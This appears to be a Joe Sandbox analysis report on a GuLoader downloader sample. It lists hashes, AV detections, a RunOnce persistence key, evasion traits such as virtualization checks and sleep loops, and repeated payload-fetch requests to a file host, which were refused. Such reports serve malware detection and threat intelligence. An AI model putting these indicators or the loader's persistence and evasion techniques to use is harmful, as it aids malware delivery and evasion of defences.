Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2Jq4fZJIJ8.exe

Overview

General Information

Sample name:2Jq4fZJIJ8.exe
renamed because original name is a hash value
Original sample name:d069c61ff3b843b2ee5165f0bac7c30693f0ee9893906f984662f04eaacbee61.exe
Analysis ID:1632358
MD5:93c0345871a7c67079d8d8bc5d722493
SHA1:344872f40c4f4f04b8b20f5de290bd62b678ef40
SHA256:d069c61ff3b843b2ee5165f0bac7c30693f0ee9893906f984662f04eaacbee61
Tags:exeGuLoadersigneduser-adrian__luca
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious PE digital signature
Joe Sandbox ML detected suspicious sample
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

  • System is w10x64
  • 2Jq4fZJIJ8.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\2Jq4fZJIJ8.exe" MD5: 93C0345871A7C67079D8D8BC5D722493)
    • 2Jq4fZJIJ8.exe (PID: 5284 cmdline: "C:\Users\user\Desktop\2Jq4fZJIJ8.exe" MD5: 93C0345871A7C67079D8D8BC5D722493)
  • Dropworm.exe (PID: 804 cmdline: "C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe" MD5: 93C0345871A7C67079D8D8BC5D722493)
    • Dropworm.exe (PID: 3796 cmdline: "C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe" MD5: 93C0345871A7C67079D8D8BC5D722493)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1527552230.0000000000787000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
    00000009.00000002.2047681752.0000000000595000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
      00000000.00000002.1527552230.00000000007CB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
        00000009.00000002.2047681752.0000000000538000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
          00000000.00000002.1528537573.0000000006497000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 3 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: New RUN Key Pointing to Suspicious Folder
            Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\2Jq4fZJIJ8.exe, ProcessId: 5284, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Tapestrying
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\2Jq4fZJIJ8.exe, ProcessId: 5284, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Tapestrying

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T22:50:26.469808+010028032702Potentially Bad Traffic192.168.2.44972038.108.185.115443TCP
            2025-03-07T22:50:33.690204+010028032702Potentially Bad Traffic192.168.2.44972238.108.185.115443TCP
            2025-03-07T22:50:41.041061+010028032702Potentially Bad Traffic192.168.2.44972438.108.185.115443TCP
            2025-03-07T22:50:57.673014+010028032702Potentially Bad Traffic192.168.2.44972738.108.185.115443TCP
            2025-03-07T22:51:02.778925+010028032702Potentially Bad Traffic192.168.2.44972938.108.185.115443TCP
            2025-03-07T22:51:10.329816+010028032702Potentially Bad Traffic192.168.2.44973138.108.185.115443TCP
            2025-03-07T22:51:17.869052+010028032702Potentially Bad Traffic192.168.2.44973338.108.185.115443TCP
            2025-03-07T22:51:19.351809+010028032702Potentially Bad Traffic192.168.2.44973438.108.185.115443TCP
            2025-03-07T22:51:25.069169+010028032702Potentially Bad Traffic192.168.2.44973738.108.185.115443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: 2Jq4fZJIJ8.exeAvira: detected
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeAvira: detection malicious, Label: HEUR/AGEN.1361137
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeReversingLabs: Detection: 52%
            Multi AV Scanner detection for submitted file
            Source: 2Jq4fZJIJ8.exeVirustotal: Detection: 65%Perma Link
            Source: 2Jq4fZJIJ8.exeReversingLabs: Detection: 52%
            Joe Sandbox ML detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: 2Jq4fZJIJ8.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49727 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49723 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49725 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49728 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49739 version: TLS 1.2
            Source: 2Jq4fZJIJ8.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeCode function: 0_2_00405FFD FindFirstFileA,FindClose,0_2_00405FFD
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeCode function: 0_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040559B
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeCode function: 8_2_00405FFD FindFirstFileA,FindClose,8_2_00405FFD
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeCode function: 8_2_00402688 FindFirstFileA,8_2_00402688
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeCode function: 8_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,8_2_0040559B
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeCode function: 9_2_00405FFD FindFirstFileA,FindClose,9_2_00405FFD
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeCode function: 9_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,9_2_0040559B
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeCode function: 9_2_00402688 FindFirstFileA,9_2_00402688
            Source: Joe Sandbox ViewIP Address: 38.108.185.115 38.108.185.115
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49722 -> 38.108.185.115:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49733 -> 38.108.185.115:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49729 -> 38.108.185.115:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49734 -> 38.108.185.115:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49720 -> 38.108.185.115:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49724 -> 38.108.185.115:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49727 -> 38.108.185.115:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 38.108.185.115:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49731 -> 38.108.185.115:443
            Source: global trafficHTTP traffic detected: GET /d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /f/MzdfMzIxNzQ4MzhfWGo3SW8?file_error=File+is+inaccessible+due+to+account+suspension. HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cacheConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /f/MzdfMzIxNzQ4MzhfWGo3SW8?file_error=File+is+inaccessible+due+to+account+suspension. HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cacheConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /f/MzdfMzIxNzQ4MzhfWGo3SW8?file_error=File+is+inaccessible+due+to+account+suspension. HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cacheConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /f/MzdfMzIxNzQ4MzhfWGo3SW8?file_error=File+is+inaccessible+due+to+account+suspension. HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cacheConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /f/MzdfMzIxNzQ4MzhfWGo3SW8?file_error=File+is+inaccessible+due+to+account+suspension. HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cacheConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /f/MzdfMzIxNzQ4MzhfWGo3SW8?file_error=File+is+inaccessible+due+to+account+suspension. HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cacheConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /f/MzdfMzIxNzQ4MzhfWGo3SW8?file_error=File+is+inaccessible+due+to+account+suspension. HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cacheConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /f/MzdfMzIxNzQ4MzhfWGo3SW8?file_error=File+is+inaccessible+due+to+account+suspension. HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cacheConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cache
            Source: unknownHTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49727 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /f/MzdfMzIxNzQ4MzhfWGo3SW8?file_error=File+is+inaccessible+due+to+account+suspension. HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cacheConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /f/MzdfMzIxNzQ4MzhfWGo3SW8?file_error=File+is+inaccessible+due+to+account+suspension. HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cacheConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /f/MzdfMzIxNzQ4MzhfWGo3SW8?file_error=File+is+inaccessible+due+to+account+suspension. HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cacheConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /f/MzdfMzIxNzQ4MzhfWGo3SW8?file_error=File+is+inaccessible+due+to+account+suspension. HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cacheConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /f/MzdfMzIxNzQ4MzhfWGo3SW8?file_error=File+is+inaccessible+due+to+account+suspension. HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cacheConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /f/MzdfMzIxNzQ4MzhfWGo3SW8?file_error=File+is+inaccessible+due+to+account+suspension. HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cacheConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /f/MzdfMzIxNzQ4MzhfWGo3SW8?file_error=File+is+inaccessible+due+to+account+suspension. HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cacheConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /f/MzdfMzIxNzQ4MzhfWGo3SW8?file_error=File+is+inaccessible+due+to+account+suspension. HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cacheConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: od.lk
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Mar 2025 21:50:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33Cache-Control: no-cache, max-age=0, s-max-age=0, must-revalidate, no-storeError-Message: File is inaccessible due to account suspension.Error: X-FastCGI-Cache: MISSStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniff
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Mar 2025 21:50:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33Cache-Control: no-cache, max-age=0, s-max-age=0, must-revalidate, no-storeError-Message: File is inaccessible due to account suspension.Error: X-FastCGI-Cache: HITStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniff
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Mar 2025 21:50:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33Cache-Control: no-cache, max-age=0, s-max-age=0, must-revalidate, no-storeError-Message: File is inaccessible due to account suspension.Error: X-FastCGI-Cache: HITStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniff
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Mar 2025 21:50:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33Cache-Control: no-cache, max-age=0, s-max-age=0, must-revalidate, no-storeError-Message: File is inaccessible due to account suspension.Error: X-FastCGI-Cache: HITStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniff
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Mar 2025 21:51:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33Cache-Control: no-cache, max-age=0, s-max-age=0, must-revalidate, no-storeError-Message: File is inaccessible due to account suspension.Error: X-FastCGI-Cache: HITStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniff
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Mar 2025 21:51:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33Cache-Control: no-cache, max-age=0, s-max-age=0, must-revalidate, no-storeError-Message: File is inaccessible due to account suspension.Error: X-FastCGI-Cache: HITStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniff
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Mar 2025 21:51:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33Cache-Control: no-cache, max-age=0, s-max-age=0, must-revalidate, no-storeError-Message: File is inaccessible due to account suspension.Error: X-FastCGI-Cache: HITStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniff
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Mar 2025 21:51:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33Cache-Control: no-cache, max-age=0, s-max-age=0, must-revalidate, no-storeError-Message: File is inaccessible due to account suspension.Error: X-FastCGI-Cache: HITStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniff
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.0000000003368000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/0
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.0000000003368000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/sfig2.crt0
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.starfieldtech.com/repository/1402
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.starfi
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.starfieldte
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.0000000003368000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.starfieldtech.com/sfig2s1-775.crl0c
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.starfieldtech.com/sfroot-g2.crl0L
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.starfieldtech.com/sfroot.crl0L
